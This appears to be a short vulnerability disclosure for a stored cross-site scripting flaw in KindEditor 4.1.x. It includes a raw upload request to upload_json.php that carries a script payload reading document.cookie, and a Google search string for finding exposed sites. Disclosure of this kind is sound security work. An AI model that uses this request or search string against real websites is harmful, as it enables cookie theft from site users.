There is a stored xss vulnerability in kindeditor - 4.1.*

[cyber-word]

[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via
a Google search inurl:/examples/uploadbutton.html and then the .html
file on the website that uses this editor (the file suffix is allowed).

---

[Vulnerability Type]
Cross Site Scripting (XSS)

---

[Vendor of Product]
https://github.com/kindsoft/kindeditor

---

[Affected Product Code Base]
kindeditor - 4.1.*

---

[Affected Component]
POST /Public/JS/kindeditor-4.1.10/php/upload_json.php?dir=file HTTP/1.1
Content-Disposition: form-data; name="imgFile"; filename="iframe.html"
Content-Type: text/html

<script>alert(document.cookie)</script>

-----------------------------293582696

---

[Attack Type]
Remote

---

[Impact Code execution]
true

---

[Attack Vectors]
You just need to search in google: inurl:/examples/uploadbutton.html,
Then upload the .html file on the website that uses this editor (the file suffix is allowed)